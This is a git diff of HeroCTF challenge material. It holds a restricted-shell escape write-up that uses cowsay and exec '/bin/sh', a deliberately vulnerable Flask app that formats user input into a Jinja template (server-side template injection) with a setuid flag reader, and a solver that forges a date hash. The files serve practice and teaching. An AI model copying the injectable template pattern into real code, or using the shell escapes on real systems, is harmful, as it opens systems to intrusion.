diff --git a/misc/cloud_shell/README.md b/misc/cloud_shell/README.md new file mode 100644 index 0000000..0b2a16c --- /dev/null +++ b/misc/cloud_shell/README.md @@ -0,0 +1,75 @@ +``` +/ $ echo $PATH +/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin +/ $ ls -l /usr/local/sbin +ls: /usr/local/sbin: No such file or directory +/ $ ls -l /usr/local/bin +ls: /usr/local/bin: No such file or directory +/ $ ls -l /usr/sbin +ls: /usr/sbin: No such file or directory +/ $ ls -l /usr/bin +ls: /usr/bin: No such file or directory +/ $ ls -l /sbin +ls: /sbin: No such file or directory +/ $ ls -l /bin +total 4120 +-rwxr-xr-x 1 root 0 808712 Oct 24 17:14 cat +-rwxr-xr-x 2 root 0 443480 Oct 24 17:14 cloud_cat +-rwxr-xr-x 1 root 0 443480 Oct 24 17:14 cloud_create +-rwxr-xr-x 1 root 0 443480 Oct 24 17:14 cloud_list +-rwxr-xr-x 1 root 0 443480 Oct 24 17:14 cloud_mv +-rwxr-xr-x 1 root 0 808712 Oct 24 17:14 ls +-rwxr-xr-x 1 root 0 808712 Oct 24 17:14 sh +``` + +``` +/ $ cat /etc/passwd +root:x:0:0:root:/root:/bin/sh +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/mail:/sbin/nologin +news:x:9:13:news:/usr/lib/news:/sbin/nologin +uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin +cron:x:16:16:cron:/var/spool/cron:/sbin/nologin +ftp:x:21:21::/var/lib/ftp:/sbin/nologin +sshd:x:22:22:sshd:/dev/null:/sbin/nologin +games:x:35:35:games:/usr/games:/sbin/nologin +ntp:x:123:123:NTP:/var/empty:/sbin/nologin +guest:x:405:100:guest:/dev/null:/sbin/nologin +nobody:x:65534:65534:nobody:/:/sbin/nologin +gaoler:x:1000:1000:Linux User,,,:/home/gaoler:/bin/sh +restricted:x:1001:1001:Linux User,,,:/home/restricted:/bin/jail +``` + +``` + ____ _ _ ____ _ _ _ + / ___| | ___ _ _ __| | / ___|| |__ ___| | | +| | | |/ _ \| | | |/ _` | \___ \| '_ \ / _ \ | | +| |___| | (_) | |_| | (_| | ___) | | | | __/ | | + \____|_|\___/ \__,_|\__,_| |____/|_| |_|\___|_|_| + + +Welcome to Cloud Shell ! + +Here you can interact with your personal vault using our custom binaries : +- cloud_cat : Get the content of the specified file +- cloud_list : List your current file(s) +- cloud_mv : Rename a file +- cloud_create : Create a file with his content + +If you don't know how to use a binary, just execute it without arguments, help will be provided ! + +/ $ cloud_cat +Usage: cloud_cat +/ $ cloud_list +cloud_socket +/ $ cloud_mv +Usage: cloud_mv +/ $ cloud_create +Usage: cloud_create +/ $ +``` diff --git a/misc/free_shell.py b/misc/free_shell/free_shell.py similarity index 100% rename from misc/free_shell.py rename to misc/free_shell/free_shell.py diff --git a/misc/moo/README.md b/misc/moo/README.md new file mode 100644 index 0000000..49d1717 --- /dev/null +++ b/misc/moo/README.md @@ -0,0 +1,80 @@ +# misc/Moo +We are given SSH access to a machine. We drop into a restricted shell and must break out of it to read the flag. + +``` +ssh -p 11380 dyn05.heroctf.fr +user@dyn05.heroctf.fr's password: +Linux moo 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64 + +The programs included with the Debian GNU/Linux system are free software; +the exact distribution terms for each program are described in the +individual files in /usr/share/doc/*/copyright. + +Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent +permitted by applicable law. +Last login: Fri Oct 25 20:27:41 2024 from 149.102.226.202 + ______________________________________________________ +/ Welcome dear CTF player! You can read the flag with: \ +\ /bin/sudo /bin/cat /flag.txt. Or can you?... / + ------------------------------------------------------ + \ ^__^ + \ (oo)\_______ + (__)\ )\/\ + ||----w | + || || +``` + +When we try to run the commands, we see we're in a restricted shell: +``` +user@moo:~$ /bin/sudo /bin/cat /flag.txt +bash: /bin/sudo: restricted: cannot specify `/' in command names +``` + +Let's take a look at our environment a bit with `env`: +``` +bash: env: command not found +``` + +Next thing to do would be look at what our `PATH` is set to: +``` +user@moo:~$ echo $PATH +/usr/local/rbin +``` + +Attempting to update our `PATH` with `export` fails as well: +``` +user@moo:~$ PATH=/bin sudo id +bash: PATH: readonly variable +bash: sudo: command not found +``` + +Well, let's see what is actually available to us in the only `PATH` we have available: +``` +user@moo:~$ ls -la $PATH +total 24 +drwxr-xr-x 1 root root 4096 Oct 25 18:18 . +drwxr-xr-x 1 root root 4096 Oct 25 18:18 .. +lrwxrwxrwx 1 root root 17 Oct 25 18:18 cowsay -> /usr/games/cowsay +lrwxrwxrwx 1 root root 18 Oct 25 18:18 dircolors -> /usr/bin/dircolors +lrwxrwxrwx 1 root root 7 Oct 25 18:18 ls -> /bin/ls +-rwxr-xr-x 1 root root 206 Oct 25 17:35 rbash +-rwxr-xr-x 1 root root 54 Oct 25 17:35 vim +``` + +This reveals a few things: +- We are in a restricted bashshell +- We have `cowsay` + +So we use `cowsay` as a the GTFObin that it is, however we cannot redirect output. Luckily we have +`vim`. + +After putting our breakout (`exec "/bin/sh";`) into a file, we can then run it with `cowsay`: +``` +cowsay -f tmp x +``` + +This gives us a full unrestricted shell, and we can now `cat` the flag: +``` +PATH=/bin +Hero{s0m3_s4cr3d_c0w} +``` diff --git a/web/jinjatic/jinjatic.tar.xz b/web/jinjatic/jinjatic.tar.xz new file mode 100644 index 0000000..087be44 Binary files /dev/null and b/web/jinjatic/jinjatic.tar.xz differ diff --git a/web/jinjatic/jinjatic/docker-compose.yml b/web/jinjatic/jinjatic/docker-compose.yml new file mode 100644 index 0000000..b865e04 --- /dev/null +++ b/web/jinjatic/jinjatic/docker-compose.yml @@ -0,0 +1,14 @@ +version: '3.8' + +services: + web: + build: + context: ./src/ + ports: + - "8000:80" + restart: unless-stopped + deploy: + resources: + limits: + cpus: "0.5" + memory: 1G diff --git a/web/jinjatic/jinjatic/src/Dockerfile b/web/jinjatic/jinjatic/src/Dockerfile new file mode 100644 index 0000000..e81eaad --- /dev/null +++ b/web/jinjatic/jinjatic/src/Dockerfile @@ -0,0 +1,26 @@ +FROM alpine:3.17.0 + +# Init +RUN apk update && \ + apk add --no-cache gcc libc-dev python3 py3-pip && \ +# Create user + adduser -D -u 1000 challenge && \ + echo "challenge:$(head -c 32 /dev/urandom | base64)" | chpasswd + +#Setup flag +WORKDIR /root/ +COPY getflag.c . +RUN gcc getflag.c -o getflag && \ + chmod u+s getflag && \ + mv getflag ../ && \ + rm getflag.c +COPY flag.txt . + +#Setup webapp +WORKDIR /app/ +COPY ./challenge/ . +RUN pip3 install -r requirements.txt + +USER challenge + +CMD ["python3","/app/app.py"] diff --git a/web/jinjatic/jinjatic/src/challenge/app.py b/web/jinjatic/jinjatic/src/challenge/app.py new file mode 100644 index 0000000..ec6b731 --- /dev/null +++ b/web/jinjatic/jinjatic/src/challenge/app.py @@ -0,0 +1,53 @@ +from flask import Flask, render_template, request +from pydantic import BaseModel, EmailStr, ValidationError +from jinja2 import Template + +app = Flask(__name__) + +email_template = ''' + + + + + + Email Result + + + +
+
+

Welcome on the platform !

+

Your email to connect is: %s

+
+ Generate another welcome email +
+ + + + + +''' + +class EmailModel(BaseModel): + email: EmailStr + +@app.route('/') +def home(): + return render_template('home.html') + +@app.route('/mail') +def mail(): + return render_template('mail.html') + +@app.route('/render', methods=['POST']) +def render_email(): + email = request.form.get('email') + + try: + email_obj = EmailModel(email=email) + return Template(email_template%(email)).render() + except ValidationError as e: + return render_template('mail.html', error="Invalid email format.") + +if __name__ == '__main__': + app.run(host="0.0.0.0", port=80) diff --git a/web/jinjatic/jinjatic/src/challenge/requirements.txt b/web/jinjatic/jinjatic/src/challenge/requirements.txt new file mode 100644 index 0000000..4346070 --- /dev/null +++ b/web/jinjatic/jinjatic/src/challenge/requirements.txt @@ -0,0 +1,4 @@ +flask +pydantic +pydantic[email] +jinja2 diff --git a/web/jinjatic/jinjatic/src/challenge/templates/home.html b/web/jinjatic/jinjatic/src/challenge/templates/home.html new file mode 100644 index 0000000..279ffff --- /dev/null +++ b/web/jinjatic/jinjatic/src/challenge/templates/home.html @@ -0,0 +1,21 @@ + + + + + + Home + + + +
+
+

We render, you use it

+

Give us emails of your customers to send them a welcome email.

+ Go to Email Page +
+
+ + + + + diff --git a/web/jinjatic/jinjatic/src/challenge/templates/mail.html b/web/jinjatic/jinjatic/src/challenge/templates/mail.html new file mode 100644 index 0000000..693237a --- /dev/null +++ b/web/jinjatic/jinjatic/src/challenge/templates/mail.html @@ -0,0 +1,35 @@ + + + + + + Mail + + + +
+
+
+

Enter email of your client

+ + {% if error %} + + {% endif %} + +
+
+ + +
+ +
+
+
+
+ + + + + diff --git a/web/jinjatic/jinjatic/src/challenge/templates/result.html b/web/jinjatic/jinjatic/src/challenge/templates/result.html new file mode 100644 index 0000000..0f20315 --- /dev/null +++ b/web/jinjatic/jinjatic/src/challenge/templates/result.html @@ -0,0 +1,21 @@ + + + + + + Email Result + + + +
+
+

Welcome on the platform !

+

Your email to connect is: {{ email }}

+
+ Generate another welcome email +
+ + + + + diff --git a/web/jinjatic/jinjatic/src/flag.txt b/web/jinjatic/jinjatic/src/flag.txt new file mode 100644 index 0000000..508ddf5 --- /dev/null +++ b/web/jinjatic/jinjatic/src/flag.txt @@ -0,0 +1 @@ +HERO{FAKE_FLAG} \ No newline at end of file diff --git a/web/jinjatic/jinjatic/src/getflag.c b/web/jinjatic/jinjatic/src/getflag.c new file mode 100644 index 0000000..c96c7eb --- /dev/null +++ b/web/jinjatic/jinjatic/src/getflag.c @@ -0,0 +1,21 @@ +#include +#include + +int main() { + const char *file_path = "/root/flag.txt"; + + FILE *file = fopen(file_path, "r"); + if (file == NULL) { + perror("Erreur lors de l'ouverture du fichier"); + return EXIT_FAILURE; + } + + char ch; + while ((ch = fgetc(file)) != EOF) { + putchar(ch); + } + + fclose(file); + + return EXIT_SUCCESS; +} \ No newline at end of file diff --git a/web/pryzes/PrYzes/solver.py b/web/pryzes/PrYzes/solver.py new file mode 100644 index 0000000..4da6a21 --- /dev/null +++ b/web/pryzes/PrYzes/solver.py @@ -0,0 +1,22 @@ +import hashlib +import json +from datetime import datetime + + +def compute_sha256(data): + sha256_hash = hashlib.sha256() + sha256_hash.update(data.encode("utf-8")) + return sha256_hash.hexdigest() + + +def main(): + # create datetime object with date 25/10/2121 + date_obj = datetime.strptime("25/10/2121", "%d/%m/%Y") + + json_data = json.dumps({"date": date_obj.strftime("%d/%m/%Y")}) + print(compute_sha256(json_data)) + print(json_data) + + +if __name__ == '__main__': + main()